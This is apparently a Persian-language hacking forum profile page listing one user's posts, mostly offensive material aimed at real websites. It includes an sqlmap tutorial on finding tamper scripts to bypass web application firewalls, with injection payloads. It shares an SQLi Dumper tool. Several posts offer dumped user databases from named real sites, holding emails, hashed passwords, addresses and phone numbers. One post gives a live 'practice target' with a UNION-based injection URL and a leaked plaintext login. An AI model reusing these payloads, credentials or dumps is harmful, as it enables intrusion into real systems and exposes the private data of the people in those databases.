-
ارسال ها
314 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
84
mownten آخرین بار در روز آگوست 31 2021 برنده شده
mownten یکی از رکورد داران بیشترین تعداد پسند مطالب است !
درباره mownten
آخرین بازدید کنندگان پروفایل
دستاوردهای mownten
-
Xrey به یک ارسالی در موضوع واکنش نشان داد: کرک اینستاگرام
-
johnjones به یک ارسالی در موضوع واکنش نشان داد: آموزش جامع هک ویندوز 8,7 و 10 با متااسپلویت
-
johnjones به یک پاسخ به یک بروزرسانی وضعیت واکنش نشان داد: سلام. آقای دمون بنده منتظر پاسخ شما هستم. ممنون.
-
johnjones به یک پاسخ به یک بروزرسانی وضعیت واکنش نشان داد: سلام. آقای دمون بنده منتظر پاسخ شما هستم. ممنون.
-
johnjones به یک ارسالی در موضوع واکنش نشان داد: WhatsApp جعلی که در پلیاستور بیش از 1 میلیون بار دانلود شد
-
johnjones به یک ارسالی در موضوع واکنش نشان داد: هکرهای روسی صدها مقام آمریکایی را هدف قرار دادند
-
johnjones به یک ارسالی در موضوع واکنش نشان داد: نمونه کار های گرافیکی
-
arshiaprm2000 به یک ارسالی در موضوع واکنش نشان داد: بایند کردن فایل Apk (رات) با فایل Png.
-
backpack به یک ارسالی در موضوع واکنش نشان داد: باجافزار DoubleLocker اندروید که اطلاعات را قفل و پینکد را تغییر میدهد
-
johnjones به یک پاسخ به یک بروزرسانی وضعیت واکنش نشان داد: شروع دوباره Spider Project فریمورک امنیتی گارد ایران
-
سلام. از هر جایی که اینترنت میگیرید برای خونه یا محل کار باید درخواست فعالسازی IP VALID بدید.
-
mownten به یک ارسالی در موضوع واکنش نشان داد: آموزش نصب آرمیتج در کالی لینوکس Armitage Install Kali Linux
-
mownten به یک ارسالی در موضوع واکنش نشان داد: آموزش دیفیس وبسایت به کمک NoRedirect
-
mownten به یک ارسالی در موضوع واکنش نشان داد: bypass NOT ACCEPTABLE
-
نمایش پسورد وای فای در مودم
mownten پاسخی برای mortalwolf ارسال کرد در موضوع : آموزشهای تصویری شبکه و روشهای مقابله
اگر هم یک موقع دیدید که اینترنت ندارید و در هر کادر خاصی از پنجره ها بودید . حتی وقتی که یه جا پسوردتون ذخیره هست ولی یادتون رفته و میخواید ببینیدش که چی ذخیره شده میتونید با google chrome یا mozilla firefix روی کادر پسورد کلیک راست کنید و و Inespect رو بزنید. توی کدهای اون کادر میبینید که این عبارت نوشته شده: type=password این یعنی اینکه اون کادر موظف هست هر ورودی که داره رو به شکل پسورد با علامت ستاره نشون بده. شما هم عبارت password رو به text تغییر بدید و اینتر بزنید. میبینید که متن رو واضح نشون میده. این هم مال مواقعی که بخواید بصورت دستی، یه پسورد رو بخونید. موفق باشید -
سلام. دوست عزیز می بینم که تازه به جمع ما اضافه شدی و خوش اومدی. انگیزه ای هم داری برای انتشار اطالعات که خیلی خوبه. حتی این سمپل های XSS بدرد من هم میخوره. فقط ازت میخوام که کمی تمیزتر کار کنی. توضیحاتت رو توی فایل متنی ننویس. همین جا توی پست بنویس. لطفا کدها و دستورات رو توی یه فایل zip بذار با پسورد guardiran.org و بعدا پیوست کن. اینجوری خیلی بهم ریخته س جسارتا. موفق باشی.
-
آموزش کامل کار با اسکنر Acunetix
mownten پاسخی برای MR.M.ANGRY9 ارسال کرد در موضوع : آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلا. چه فرقی داره؟ اون آموزش مال تیر ماه سال 94 هست و حدود پنج سال ازش میگذره شما هم میتونی آخری نسخه ی accunetix رو بگیری و نصب کنی.- 11 پاسخ
-
- آموزش Acunetix
- آموزش پیدا کردن باگ در سایت
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
اموزش sqlmap آموزش یافتن tamper مناسب برای sqlmap در زمان مواجهه با WAF
mownten پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
[سطح: متوسط] با عرض سلام و تبریک سال نو به کاربران عزیز من امروز با یه مورد خوب و مشکل گشا توی حملات SQLi مواجه شدم که تصمیم گرفتم بیام براتون توضیح بدم. مساله اینه که بیشترین انگیزه برای حمله برای اکثریت کاربران، حمله به وبسایت های آسیب پذیر در قبال باگ SQL Injection هست لکن بعضی واقع با فایروال هایی مواجه میشن و وقتی کار رو بصورت کامل هم میسپرن به دست sqlmap، باز به مشکل بر میخورن. اینجا مهاجم باید از Tamperها استفاده بکنه تا بتونه فایروال رو بایپس کنه اما یکی دو تا نیستن که و sqlmap هم فقط گاها space2comment رو پیشنهاد میده. چطور میشه کل تمپر ها رو تست کرد؟ با ابزاری به نام Atlas. امروز با ابزار Atlas آشنا میشیم که برای بایپس کردن WAF یا IDS یا IPS و یافتن Tamper مناسب مفید هست. بریم سراغ اصل مطلب. دستورات نصب و اجرای این ابزار توی لینوکس به شرح زیر هست: $ git clone [Hidden Content] atlas $ cd atlas $ python atlas.py فرض کنیم لینک اسیب پذیر ما این هست: [Hidden Content] و پیلود ما هم اینه: -1234 AND 4321=4321-- AAAA برای استفاده از این ابزار باید از دستور اینچنینی استفاده کنید: $ python atlas.py --url [Hidden Content] --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v حالا این ابزار کجا و چه زمانی استفاده میشه؟ فرض کنید توی sqlmap از این دستور استفاده کردید و با یه WAF برخورد کردید: $ python sqlmap.py -u '[Hidden Content]' --dbs --random-agent -v 3 تصویر رو ببینید: در اینجا پیلود به شرح زیر هست که توسط WAF یا IPS یا IDS بلاک شده و با خطای 403 Forbidden مواجه شده. پیلود : Price_ASC') AND 8716=4837 AND ('yajr'='yajr کافیه همین پیلود رو ورداریم و بدیم به Atlas با tamper مناسب برای بایپس و حل این مشکل رو پیشنهاد بده. بدین شکل: $ python atlas.py --url '[Hidden Content]' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v حالا نتیجه : میبینیم که در خط سبک رنگ به ما پیشنهاد داده شده که از تمپری به نام Versiondkeywords استفاده کنیم تا اون فایروال روی وبسایت هدف، بایپس بشه. پس از این تمپر بدین شکل استفاده می کنیم: $ python sqlmap.py -u '[Hidden Content]' --dbs --random-agent -v 3 --tamper=versionedkeywords لینک دریافت Atlas از Github: [Hidden Content] موفق باشید. سوالی هم داشتید در ادامه این تاپیک نپرسید. در تاپیک سوال و جواب بپرسید. Atlas-sqlmap-tamper-suggesy-master.zip-
- tamper finder
- sql inejction
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
mownten به یک پاسخ به یک بروزرسانی وضعیت واکنش نشان داد: Watching a bad month In My Life
-
mownten به یک پاسخ به یک بروزرسانی وضعیت واکنش نشان داد: Watching the worst days of life
-
mownten به یک پاسخ به یک بروزرسانی وضعیت واکنش نشان داد: تارگت مسابقه ویرایش شد
-
mownten به یک بروزرسانی وضعیت واکنش نشان داد: گرگ صفتان را دوست میدارم شیرها ادعا میکنند سلطان جنگلند ! و ببر قویترین حیوان دنیاست
-
mownten به یک پاسخ به یک بروزرسانی وضعیت واکنش نشان داد: تارگت مسابقه ویرایش شد
-
mownten به یک بروزرسانی وضعیت واکنش نشان داد: به بعضیا باث گفت که اونایی که اونایی که باهاشون راه میری راه رفتنو از ما یاد گرفتن.
-
mownten به یک بروزرسانی وضعیت واکنش نشان داد: به بعضیا باث بگی حاجی اونایی که تو باهاشون راه میری راه رفتنو از ما یادگرفتن.
-
نرم افزار دیپ فریز
mownten پاسخی برای Mahdi_4002 ارسال کرد در موضوع : سوال و جواب های امنیت سیستم های شخصی
تا اونجا که من میدونم راهی نداری -
نرم افزار دیپ فریز
mownten پاسخی برای Mahdi_4002 ارسال کرد در موضوع : سوال و جواب های امنیت سیستم های شخصی
خب دکمه شیفت رو نگه دار و چند بار روش کلیک کن ببین باز میشه یا نه. در واقع خود فعال کننده باید غیرفعالش کنه. شوخی نداره دیپ فریز با کسی -
سوالات و جواب دوره آموزشی تست نفوذ به سرور
mownten پاسخی برای mownten ارسال کرد در موضوع : سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام. داداش زیاد watch dogs بازی کردیا. مگه هر کی به هرکیه؟ این حرفا چیه میزنی؟ شما فقط دریافت کننده از هسته ی کدنویسی هستی نه تعیین کننده. اصلا چطور میخوای شکلک بذاری که برات دستور اجرا کنن؟ چرا همچین تصوری بالیوودی از علوم سایبری داری؟- 8 پاسخ
-
- آموزش
- reverse ip lookup
- (و 13 مورد دیگر)
-
سلام دوستان. الان نسخه 10.2 نرم افزار Sqli Dumper رو دیدم که وبسایت psntools.ir معرفی کرده بود و توی کانال تلگرامیشون گذاشته بودن. من خودم از ورژن 9.7 استفاده میکنم و به نسبت 9.7، اجزایی به این نسخه اضافه شده اما حس میکنم کمی سرعتش پایین تر از 9.7 هست. در هر صورت میذارمش که بررسی کنید. ضمناً مسئولیت هرگونه سوء استفاده از این ابزار بر عهده کاربر هست. رمز : guardiran.org SQLiDumper 10.2.zip
-
نرم افزار دیپ فریز
mownten پاسخی برای Mahdi_4002 ارسال کرد در موضوع : سوال و جواب های امنیت سیستم های شخصی
یعنی خودت زدی فعالش کردی؟ ورژن چند هست؟ باید شیفت رو نگه داری و روش کلیک کنی تا کادر پسوردش باز بشه. -
سوال رو بصورت شخصی پرسیدید و جوابتون رو دادم. چرا پست میکنید دیگه؟
-
تاپیک جامع کمبو دامپ شده برای کرک
mownten پاسخی برای mownten ارسال کرد در موضوع : پسورد لیست و کمبو لیست
لینک: [Hidden Content] تعداد: حدود 27000 ردیف اطلاعات کاربری شامل ایمیل، پسورد هش شده، آدرس کامل، تلفن و غیره محتویات : یک فایل xml رمز فایل فشرده: guardiran.org linleygroup.com -27000 Rows.zip -
یک تارگت تمرینی: [Hidden Content] حدود 20 تا دیتابیس داره. اکثرا وردپرس هستن. پسوردها رمزنگاری شده به جز یکی از دیتابیس ها که مشخصاتش اینه: user: jc pass: Mos3s اگر هم خواستید به صورت دستی پیش برید از این لینک استفاده کنید: [Hidden Content],(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4--+- فایل دامپ یوزرهای کل دیتابیس ها هم پیوست میکنم. امیدوارم بدردتون بخوره. رمز: guardiran.org موفق باشید www.bible-history.com - 20 DBS.zip
-
تاپیک جامع کمبو دامپ شده برای کرک
mownten پاسخی برای mownten ارسال کرد در موضوع : پسورد لیست و کمبو لیست
لینک: [Hidden Content] تعداد: حدود 5000 ردیف شامل یوزرنیم، پسورد، سالت و غیره محتویات: یک فایل xml رمز فایل فشرده: guardiran.org lejdesigns.com -4893 Rows.zip